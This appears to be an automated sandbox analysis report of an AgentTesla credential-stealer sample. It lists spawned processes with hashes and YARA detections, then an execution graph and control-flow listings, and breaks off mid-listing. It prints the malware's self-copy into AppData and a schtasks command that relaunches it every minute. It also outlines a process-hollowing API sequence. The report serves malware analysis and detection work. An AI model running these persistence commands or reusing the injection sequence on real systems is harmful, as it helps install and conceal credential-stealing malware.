                                                            Commandline:"cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fghn\fghn.exe'" /f
                                                            Imagebase:0x7ff756d70000
                                                            File size:232960 bytes
                                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high

                                                            General

                                                            Target ID:8
                                                            Start time:17:19:30
                                                            Start date:28/08/2022
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7c72c0000
                                                            File size:625664 bytes
                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high

                                                            General

                                                            Target ID:9
                                                            Start time:17:19:30
                                                            Start date:28/08/2022
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:cmd" /c copy "C:\Users\user\Desktop\pdP5Rv9pPW.exe" "C:\Users\user\AppData\Roaming\fghn\fghn.exe
                                                            Imagebase:0xd90000
                                                            File size:232960 bytes
                                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high

                                                            General

                                                            Target ID:10
                                                            Start time:17:19:31
                                                            Start date:28/08/2022
                                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fghn\fghn.exe'" /f
                                                            Imagebase:0x200000
                                                            File size:185856 bytes
                                                            MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high

                                                            General

                                                            Target ID:11
                                                            Start time:17:19:31
                                                            Start date:28/08/2022
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7c72c0000
                                                            File size:625664 bytes
                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high

                                                            General

                                                            Target ID:12
                                                            Start time:17:19:40
                                                            Start date:28/08/2022
                                                            Path:C:\Users\user\AppData\Roaming\excel\excel.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\AppData\Roaming\excel\excel.exe"
                                                            Imagebase:0x1260000
                                                            File size:2688096 bytes
                                                            MD5 hash:B3A917344F5610BEEC562556F11300FA
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Antivirus matches:
                                                            • Detection: 2%, Metadefender, Browse
                                                            • Detection: 0%, ReversingLabs
                                                            Reputation:moderate

                                                            General

                                                            Target ID:13
                                                            Start time:17:19:41
                                                            Start date:28/08/2022
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7c72c0000
                                                            File size:625664 bytes
                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high

                                                            General

                                                            Target ID:16
                                                            Start time:17:19:49
                                                            Start date:28/08/2022
                                                            Path:C:\Users\user\AppData\Roaming\excel\excel.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\AppData\Roaming\excel\excel.exe"
                                                            Imagebase:0x1260000
                                                            File size:2688096 bytes
                                                            MD5 hash:B3A917344F5610BEEC562556F11300FA
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language

                                                            General

                                                            Target ID:17
                                                            Start time:17:19:49
                                                            Start date:28/08/2022
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7c72c0000
                                                            File size:625664 bytes
                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language

                                                            General

                                                            Target ID:21
                                                            Start time:17:20:01
                                                            Start date:28/08/2022
                                                            Path:C:\Users\user\AppData\Roaming\fghn\fghn.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Users\user\AppData\Roaming\fghn\fghn.exe
                                                            Imagebase:0x170000
                                                            File size:521216 bytes
                                                            MD5 hash:18E913EC810A1131C23D6FEA7526C4F8
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:.Net C# or VB.NET
                                                            Antivirus matches:
                                                            • Detection: 100%, Joe Sandbox ML
                                                            • Detection: 51%, ReversingLabs

                                                            General

                                                            Target ID:23
                                                            Start time:17:20:43
                                                            Start date:28/08/2022
                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                            Imagebase:0xc40000
                                                            File size:2688096 bytes
                                                            MD5 hash:B3A917344F5610BEEC562556F11300FA
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:.Net C# or VB.NET
                                                            Yara matches:
                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000017.00000002.585255160.000000000721C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000017.00000002.585255160.000000000721C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security

                                                            General

                                                            Target ID:24
                                                            Start time:17:20:47
                                                            Start date:28/08/2022
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:cmd" /c mkdir "C:\Users\user\AppData\Roaming\fghn
                                                            Imagebase:0xd90000
                                                            File size:232960 bytes
                                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language

                                                            General

                                                            Target ID:25
                                                            Start time:17:20:48
                                                            Start date:28/08/2022
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7c72c0000
                                                            File size:625664 bytes
                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language

                                                            General

                                                            Target ID:26
                                                            Start time:17:20:48
                                                            Start date:28/08/2022
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fghn\fghn.exe'" /f
                                                            Imagebase:0xd90000
                                                            File size:232960 bytes
                                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language

                                                            General

                                                            Target ID:28
                                                            Start time:17:20:50
                                                            Start date:28/08/2022
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7c72c0000
                                                            File size:625664 bytes
                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language

                                                            General

                                                            Target ID:29
                                                            Start time:17:20:50
                                                            Start date:28/08/2022
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:cmd" /c copy "C:\Users\user\AppData\Roaming\fghn\fghn.exe" "C:\Users\user\AppData\Roaming\fghn\fghn.exe
                                                            Imagebase:0xd90000
                                                            File size:232960 bytes
                                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language

                                                            General

                                                            Target ID:30
                                                            Start time:17:20:51
                                                            Start date:28/08/2022
                                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fghn\fghn.exe'" /f
                                                            Imagebase:0x200000
                                                            File size:185856 bytes
                                                            MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language

                                                            General

                                                            Target ID:31
                                                            Start time:17:20:52
                                                            Start date:28/08/2022
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7c72c0000
                                                            File size:625664 bytes
                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language

                                                            Disassembly

                                                            Reset < >

                                                              Execution Graph

                                                              Execution Coverage:34.2%
                                                              Dynamic/Decrypted Code Coverage:100%
                                                              Signature Coverage:40.3%
                                                              Total number of Nodes:77
                                                              Total number of Limit Nodes:1
                                                              execution_graph 19492 d5f0a0 19493 d5f0c0 19492->19493 19494 d5f17e 19493->19494 19497 4ecaf60 19493->19497 19526 4ecaf51 19493->19526 19498 4ecaf99 19497->19498 19555 d5f968 19498->19555 19499 4ecf447 19525 d5fd38 SetThreadContext 19499->19525 19500 4ecf48a 19512 d5fd38 SetThreadContext 19500->19512 19501 4ecf370 19501->19493 19502 4ecb5a1 19502->19499 19513 d5fdf8 ReadProcessMemory 19502->19513 19503 4ecc7fd 19514 d5feb8 VirtualAllocEx 19503->19514 19504 4ecd1d5 19504->19499 19519 4ebc6f8 WriteProcessMemory 19504->19519 19520 4ebc3f2 WriteProcessMemory 19504->19520 19521 4ebc3a0 WriteProcessMemory 19504->19521 19505 4ecd7ee 19506 4ece6d1 19505->19506 19522 4ebc6f8 WriteProcessMemory 19505->19522 19523 4ebc3f2 WriteProcessMemory 19505->19523 19524 4ebc3a0 WriteProcessMemory 19505->19524 19515 4ebc6f8 WriteProcessMemory 19506->19515 19516 4ebc3f2 WriteProcessMemory 19506->19516 19517 4ebc3a0 WriteProcessMemory 19506->19517 19507 4ecea9c 19507->19499 19508 4ecee91 19507->19508 19508->19500 19509 4ecf34b 19508->19509 19510 4ebc7c8 ResumeThread 19509->19510 19511 4ebc7d0 ResumeThread 19509->19511 19510->19501 19511->19501 19512->19501 19513->19503 19514->19504 19515->19507 19516->19507 19517->19507 19519->19505 19520->19505 19521->19505 19522->19505 19523->19505 19524->19505 19525->19500 19527 4ecaf60 19526->19527 19542 d5f968 CreateProcessAsUserA 19527->19542 19528 4ecf447 19583 d5fd38 19528->19583 19529 4ecf48a 19552 d5fd38 SetThreadContext 19529->19552 19530 4ecb5a1 19530->19528 19559 d5fdf8 19530->19559 19533 4ecd7ee 19534 4ece6d1 19533->19534 19546 4ebc6f8 WriteProcessMemory 19533->19546 19547 4ebc3f2 WriteProcessMemory 19533->19547 19548 4ebc3a0 WriteProcessMemory 19533->19548 19539 4ebc6f8 WriteProcessMemory 19534->19539 19540 4ebc3f2 WriteProcessMemory 19534->19540 19541 4ebc3a0 WriteProcessMemory 19534->19541 19535 4ecea9c 19535->19528 19536 4ecee91 19535->19536 19536->19529 19537 4ecf34b 19536->19537 19577 4ebc7c8 19537->19577 19580 4ebc7d0 19537->19580 19538 4ecf370 19538->19493 19539->19535 19540->19535 19541->19535 19542->19530 19546->19533 19547->19533 19548->19533 19552->19538 19557 d5f9f5 CreateProcessAsUserA 19555->19557 19558 d5fc0d 19557->19558 19560 d5fe40 ReadProcessMemory 19559->19560 19561 d5fe7d 19560->19561 19562 d5feb8 19561->19562 19563 d5fefb VirtualAllocEx 19562->19563 19564 d5ff32 19563->19564 19564->19528 19565 4ebc6f8 19564->19565 19569 4ebc3f2 19564->19569 19573 4ebc3a0 19564->19573 19566 4ebc743 WriteProcessMemory 19565->19566 19568 4ebc794 19566->19568 19568->19533 19570 4ebc6f8 WriteProcessMemory 19569->19570 19572 4ebc794 19570->19572 19572->19533 19574 4ebc3a5 WriteProcessMemory 19573->19574 19576 4ebc794 19574->19576 19576->19533 19578 4ebc811 ResumeThread 19577->19578 19579 4ebc83e 19578->19579 19579->19538 19581 4ebc811 ResumeThread 19580->19581 19582 4ebc83e 19581->19582 19582->19538 19584 d5fd80 SetThreadContext 19583->19584 19586 d5fdbe 19584->19586 19586->19529

                                                              Executed Functions

                                                              Function 04ED6FE5 Relevance: 5.2, Strings: 1, Instructions: 3925COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 0 4ed6fe5-4ed6fec 1 4ed6fee-4ed7015 0->1 2 4ed7055-4ed75be 0->2 3 4ed701b-4ed7050 1->3 4 4edae52-4edae58 1->4 2->4 86 4ed75c4-4ed761b 2->86 3->2 8 4edae59-4edae62 4->8 10 4edae64-4edae79 8->10 12 4edae7b-4edae8e 10->12 13 4edae44-4edae4f 10->13 15 4edaed0-4edaf02 12->15 16 4edae90-4edaea2 12->16 18 4edaea5 15->18 19 4edaf04-4edaf5e 15->19 16->8 17 4edaea4 16->17 17->18 18->10 21 4edaea7-4edaec3 18->21 24 4edafa6-4edafad 19->24 25 4edaf60-4edaf81 19->25 21->15 27 4edafaf-4edafc4 24->27 28 4edaf83-4edaf8a 24->28 30 4edafca-4edafcf 27->30 31 4edafc6-4edafc9 27->31 32 4edaf8b-4edaf8e 28->32 33 4edafd0-4edafd6 30->33 31->30 32->33 34 4edaf90-4edaf94 32->34 34->32 36 4edaf96-4edafa4 34->36 36->24 92 4ed761d-4ed7626 86->92 93 4ed7662-4ed7984 86->93 94 4ed762d-4ed7630 92->94 95 4ed7628-4ed762b 92->95 131 4ed7e9d-4ed83ba 93->131 132 4ed798a-4ed7993 93->132 96 4ed763a-4ed765f 94->96 95->96 131->4 246 4ed83c0-4ed883b 131->246 132->4 133 4ed7999-4ed79b0 132->133 137 4ed7dde-4ed7e97 133->137 138 4ed79b6-4ed7a9e 133->138 137->131 137->132 166 4ed7aa4-4ed7aaa 138->166 167 4ed7bc1-4ed7c0c 138->167 166->4 168 4ed7ab0-4ed7bbb 166->168 179 4ed7c0e-4ed7c3f 167->179 180 4ed7c70-4ed7c97 167->180 168->166 168->167 179->180 187 4ed7c41-4ed7c6e 179->187 182 4ed7c9d-4ed7dc5 180->182 220 4ed7dd0-4ed7dd9 182->220 187->182 220->131 291 4ed8916-4ed89d9 246->291 292 4ed8841-4ed8911 246->292 307 4ed89df-4ed8af2 291->307 292->307 321 4ed9e79-4eda144 307->321 322 4ed8af8-4ed8d8b 307->322 321->4 377 4eda14a-4eda177 321->377 322->4 386 4ed8d91-4ed8e59 322->386 377->4 378 4eda17d-4eda28b 377->378 378->4 400 4eda291-4eda557 378->400 386->4 404 4ed8e5f-4ed8f1b 386->404 400->4 477 4eda55d-4eda811 400->477 422 4ed8f1d-4ed8f23 404->422 423 4ed8f39-4ed8f44 404->423 422->4 424 4ed8f29-4ed8f37 422->424 428 4ed8f46-4ed8f54 423->428 424->428 431 4ed9b5e-4ed9d03 428->431 432 4ed8f5a-4ed8f66 428->432 483 4ed9d05-4ed9e73 431->483 432->431 437 4ed8f6c-4ed8f78 432->437 437->431 443 4ed8f7e-4ed922a 437->443 443->4 524 4ed9230-4ed934e 443->524 477->4 552 4eda817-4edab17 477->552 483->321 483->322 524->4 555 4ed9354-4ed961f 524->555 552->4 610 4edab1d-4edad2a 552->610 555->4 613 4ed9625-4ed9874 555->613 610->4 656 4edad30-4edae41 610->656 613->4 657 4ed987a-4ed9b4f 613->657 656->13 657->4 695 4ed9b55-4ed9b59 657->695 695->483
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.380895325.0000000004ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4ed0000_pdP5Rv9pPW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: l@
                                                              • API String ID: 0-4249425015
                                                              • Opcode ID: 4fafe060537d5f0cce44cb501b3024915012508bd48dc62c8648bd3686c606f9
                                                              • Instruction ID: 9aa14a1363ea0a861beaa68180f5dc11a2240566b385ec8d2b36d770004e4eb8
                                                              • Opcode Fuzzy Hash: 4fafe060537d5f0cce44cb501b3024915012508bd48dc62c8648bd3686c606f9
                                                              • Instruction Fuzzy Hash: 1D734B70E091188FCB54EF39E98969DBBB1FB49205F0145EAD44CA3754DB386E88CF1A
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00D52C4D Relevance: 5.1, Instructions: 5099COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 696 d52c4d-d52c82 697 d52c84 696->697 698 d52c86-d52de6 696->698 697->698 714 d52dec-d52ebb 698->714 715 d5805f-d5809e 698->715 714->715 729 d52ec1-d52fa6 714->729 718 d5809f-d580dc 715->718 720 d580f6-d580f8 718->720 721 d580de-d580f4 718->721 720->718 721->720 729->715 740 d52fac-d53394 729->740 740->715 781 d5339a-d534af 740->781 781->715 794 d534b5-d53a19 781->794 794->715 847 d53a1f-d53af9 794->847 847->715 855 d53aff-d541c3 847->855 855->715 925 d541c9-d542a3 855->925 925->715 933 d542a9-d547eb call d501ec 925->933 933->715 986 d547f1-d5484e 933->986 992 d54850-d5485c 986->992 993 d5489e-d54b34 986->993 994 d54866-d5486c 992->994 995 d5485e-d54864 992->995 1025 d55038-d554c2 993->1025 1026 d54b3a-d54b43 993->1026 997 d54876-d5489b 994->997 995->997 1025->715 1131 d554c8-d5592b 1025->1131 1026->715 1027 d54b49-d54b60 1026->1027 1031 d54f76-d55032 1027->1031 1032 d54b66-d54cac 1027->1032 1031->1025 1031->1026 1070 d54d91-d54ddf 1032->1070 1071 d54cb2-d54cb8 1032->1071 1081 d54de1-d54e12 1070->1081 1082 d54e43-d54e6a 1070->1082 1071->715 1073 d54cbe-d54d8b 1071->1073 1073->1070 1073->1071 1081->1082 1089 d54e14-d54e41 1081->1089 1085 d54e70-d54f71 1082->1085 1085->1025 1089->1085 1175 d55a25-d55b4b 1131->1175 1176 d55931-d55a20 1131->1176 1199 d55b51-d55c2c 1175->1199 1176->1199 1210 d570c6-d5738b 1199->1210 1211 d55c32-d55e89 1199->1211 1210->715 1266 d57391-d573be 1210->1266 1211->715 1271 d55e8f-d55f55 1211->1271 1266->715 1268 d573c4-d574df 1266->1268 1268->715 1290 d574e5-d577bb 1268->1290 1271->715 1288 d55f5b-d5600f 1271->1288 1306 d56011-d56017 1288->1306 1307 d5602d-d5603b 1288->1307 1290->715 1365 d577c1-d57aa4 1290->1365 1306->715 1309 d5601d-d5602b 1306->1309 1313 d5603d-d5604b 1307->1313 1309->1313 1317 d56051-d5605d 1313->1317 1318 d56d6e-d56f3b 1313->1318 1317->1318 1322 d56063-d5606f 1317->1322 1381 d56f3d-d570c0 1318->1381 1322->1318 1327 d56075-d56395 1322->1327 1327->715 1429 d5639b-d56480 1327->1429 1365->715 1451 d57aaa-d57d54 1365->1451 1381->1210 1381->1211 1429->715 1449 d56486-d5675a 1429->1449 1449->715 1508 d56760-d56a51 1449->1508 1451->715 1505 d57d5a-d57f10 1451->1505 1505->715 1537 d57f16-d5803f 1505->1537 1508->715 1569 d56a57-d56d5f 1508->1569 1565 d58047-d5805c 1537->1565 1569->715 1598 d56d65-d56d69 1569->1598 1598->1381
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.374211806.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_d50000_pdP5Rv9pPW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4e1c3ed08e6ac427e5bd968e9982a63b6a6cc208ce88d6144fd27fcc6fd783b7
                                                              • Instruction ID: c0c3cd4232eb10582d55586eb43aac87865974c5744bc2f10c437686bb4ac695
                                                              • Opcode Fuzzy Hash: 4e1c3ed08e6ac427e5bd968e9982a63b6a6cc208ce88d6144fd27fcc6fd783b7
                                                              • Instruction Fuzzy Hash: 7EA35A70E096188BCB54EF29DD85799BBB1FB49305F0045EAD448A3B54DF346E88CF2A
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 04EF5D48 Relevance: 5.0, Instructions: 4993COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1599 4ef5d48-4ef5e77 1613 4ef5e7d-4ef6040 1599->1613 1614 4efb0f1-4efb0fd 1599->1614 1613->1614 1635 4ef6046-4ef6110 1613->1635 1635->1614 1643 4ef6116-4ef64b6 1635->1643 1643->1614 1679 4ef64bc-4ef65dd 1643->1679 1679->1614 1691 4ef65e3-4ef6a35 1679->1691 1691->1614 1734 4ef6a3b-4ef6b5b 1691->1734 1734->1614 1745 4ef6b61-4ef7196 1734->1745 1745->1614 1807 4ef719c-4ef72b4 1745->1807 1807->1614 1818 4ef72ba-4ef7855 1807->1818 1818->1614 1875 4ef785b-4ef78b8 1818->1875 1881 4ef78ba-4ef78c6 1875->1881 1882 4ef7908-4ef7afd 1875->1882 1883 4ef78c8-4ef78ce 1881->1883 1884 4ef78d0-4ef78d6 1881->1884 1908 4ef7b02-4ef7c10 1882->1908 1885 4ef78e0-4ef7905 1883->1885 1884->1885 1919 4ef811f-4ef85b5 1908->1919 1920 4ef7c16-4ef7c1f 1908->1920 1919->1614 2028 4ef85bb-4ef8a9f 1919->2028 1920->1614 1921 4ef7c25-4ef7c3c 1920->1921 1925 4ef8049-4ef8119 1921->1925 1926 4ef7c42-4ef7d8c 1921->1926 1925->1919 1925->1920 1966 4ef7e67-4ef7eb5 1926->1966 1967 4ef7d92-4ef7d98 1926->1967 1977 4ef7f19-4ef7f40 1966->1977 1978 4ef7eb7-4ef7ee8 1966->1978 1967->1614 1969 4ef7d9e-4ef7e61 1967->1969 1969->1966 1969->1967 1981 4ef7f46-4ef8044 1977->1981 1978->1977 1985 4ef7eea-4ef7f17 1978->1985 1981->1919 1985->1981 2083 4ef8b7a-4ef8c3e 2028->2083 2084 4ef8aa5-4ef8b75 2028->2084 2101 4ef8c44-4ef8d1e 2083->2101 2084->2101 2109 4efa13c-4efa438 2101->2109 2110 4ef8d24-4ef8f67 2101->2110 2109->1614 2176 4efa43e-4efa46b 2109->2176 2110->1614 2165 4ef8f6d-4ef904a 2110->2165 2165->1614 2189 4ef9050-4ef910a 2165->2189 2176->1614 2177 4efa471-4efa595 2176->2177 2177->1614 2201 4efa59b-4efa824 2177->2201 2207 4ef910c-4ef9112 2189->2207 2208 4ef9128-4ef9136 2189->2208 2201->1614 2270 4efa82a-4efab55 2201->2270 2207->1614 2210 4ef9118-4ef9126 2207->2210 2214 4ef9138-4ef9146 2208->2214 2210->2214 2217 4ef914c-4ef9158 2214->2217 2218 4ef9dea-4ef9f97 2214->2218 2217->2218 2223 4ef915e-4ef916a 2217->2223 2269 4ef9f99-4efa136 2218->2269 2223->2218 2227 4ef9170-4ef942f 2223->2227 2227->1614 2311 4ef9435-4ef9565 2227->2311 2269->2109 2269->2110 2270->1614 2354 4efab5b-4efae11 2270->2354 2311->1614 2341 4ef956b-4ef9840 2311->2341 2341->1614 2397 4ef9846-4ef9b1f 2341->2397 2354->1614 2408 4efae17-4efafaf 2354->2408 2397->1614 2451 4ef9b25-4ef9ddb 2397->2451 2408->1614 2439 4efafb5-4efb0ee 2408->2439 2451->1614 2487 4ef9de1-4ef9de5 2451->2487 2487->2269
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.380992110.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4ef0000_pdP5Rv9pPW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 26102b660fc8de8ce293ed9f01ca5b1c2c2c332538ea0c2f9e166d081b494050
                                                              • Instruction ID: 45eb1b3769476d25f17813a93dc85e50dfffc4d3e2958934a81ed4533f0b8963
                                                              • Opcode Fuzzy Hash: 26102b660fc8de8ce293ed9f01ca5b1c2c2c332538ea0c2f9e166d081b494050
                                                              • Instruction Fuzzy Hash: 60A3F970E191188FCB14EF29D9896ADB7B1FB89305F0045EAD44CA7B54DB386E88CF19
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 04EE0040 Relevance: 4.7, Instructions: 4740COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 2488 4ee0040-4ee0166 2501 4ee016c-4ee0302 2488->2501 2502 4ee4b93-4ee4be2 2488->2502 2501->2502 2551 4ee0308-4ee03de 2501->2551 2505 4ee4c29-4ee4c78 2502->2505 2506 4ee4be4-4ee4bec 2502->2506 2510 4ee4c79-4ee4c7d 2505->2510 2508 4ee4bee-4ee4bf8 2506->2508 2509 4ee4bfa-4ee4c26 2506->2509 2508->2509 2509->2505 2510->2510 2511 4ee4c7e-4ee4cbc 2510->2511 2512 4ee4cbe 2511->2512 2513 4ee4d08-4ee4d0d 2511->2513 2515 4ee4d00-4ee4d03 2512->2515 2516 4ee4cc0-4ee4cce 2512->2516 2517 4ee4d04-4ee4d07 2513->2517 2515->2517 2518 4ee4d10-4ee4d54 2516->2518 2519 4ee4cd0-4ee4cfb 2516->2519 2517->2513 2521 4ee4d56-4ee4d6c 2518->2521 2522 4ee4da5 2518->2522 2519->2515 2523 4ee4d6f-4ee4d84 2521->2523 2524 4ee4da7-4ee4db9 2522->2524 2527 4ee4dbf-4ee4dd8 2523->2527 2528 4ee4d86-4ee4d8c 2523->2528 2524->2524 2526 4ee4dbb-4ee4dbc 2524->2526 2526->2527 2530 4ee4dd9-4ee4ddb 2527->2530 2531 4ee4d8e-4ee4d9e 2528->2531 2532 4ee4ddf 2528->2532 2530->2523 2533 4ee4ddd-4ee4dde 2530->2533 2534 4ee4de0-4ee4ded 2531->2534 2535 4ee4da0-4ee4da4 2531->2535 2532->2534 2533->2532 2534->2530 2539 4ee4def-4ee4e36 2534->2539 2535->2522 2542 4ee4e78-4ee4eab 2539->2542 2543 4ee4e38-4ee4e6f 2539->2543 2543->2542 2551->2502 2559 4ee03e4-4ee07c4 2551->2559 2559->2502 2590 4ee07ca-4ee08aa 2559->2590 2590->2502 2598 4ee08b0-4ee0d52 2590->2598 2598->2502 2636 4ee0d58-4ee0e58 2598->2636 2636->2502 2645 4ee0e5e-4ee132b 2636->2645 2645->2502 2686 4ee1331-4ee13f6 2645->2686 2686->2502 2693 4ee13fc-4ee1962 2686->2693 2693->2502 2737 4ee1968-4ee19c1 2693->2737 2743 4ee19c3-4ee19cf 2737->2743 2744 4ee1a11-4ee1c7c 2737->2744 2745 4ee19d9-4ee19df 2743->2745 2746 4ee19d1-4ee19d7 2743->2746 2769 4ee20c5-4ee2522 2744->2769 2770 4ee1c82-4ee1c8b 2744->2770 2748 4ee19e9-4ee1a0e 2745->2748 2746->2748 2769->2502 2851 4ee2528-4ee295f 2769->2851 2770->2502 2771 4ee1c91-4ee1ca8 2770->2771 2774 4ee1cae-4ee1d80 2771->2774 2775 4ee2019-4ee20bf 2771->2775 2798 4ee1d86-4ee1d8c 2774->2798 2799 4ee1e47-4ee1e95 2774->2799 2775->2769 2775->2770 2798->2502 2800 4ee1d92-4ee1e41 2798->2800 2811 4ee1ef6-4ee1f1d 2799->2811 2812 4ee1e97-4ee1ec5 2799->2812 2800->2798 2800->2799 2813 4ee1f23-4ee2000 2811->2813 2812->2811 2818 4ee1ec7-4ee1ef4 2812->2818 2836 4ee200b-4ee2014 2813->2836 2818->2813 2836->2769 2888 4ee2965-4ee2975 2851->2888 2890 4ee297b-4ee2a24 2888->2890 2891 4ee2a29-4ee2ae6 2888->2891 2902 4ee2aec-4ee2be0 2890->2902 2891->2902 2911 4ee3da6-4ee3f58 2902->2911 2912 4ee2be6-4ee2deb 2902->2912 2911->2502 2939 4ee3f5e-4ee3f8b 2911->2939 2912->2502 2954 4ee2df1-4ee2e9b 2912->2954 2939->2502 2940 4ee3f91-4ee40bc 2939->2940 2940->2502 2960 4ee40c2-4ee439b 2940->2960 2954->2502 2968 4ee2ea1-4ee2f4c 2954->2968 2960->2502 3022 4ee43a1-4ee4634 2960->3022 2982 4ee2f4e-4ee2f54 2968->2982 2983 4ee2f6a-4ee2f78 2968->2983 2982->2502 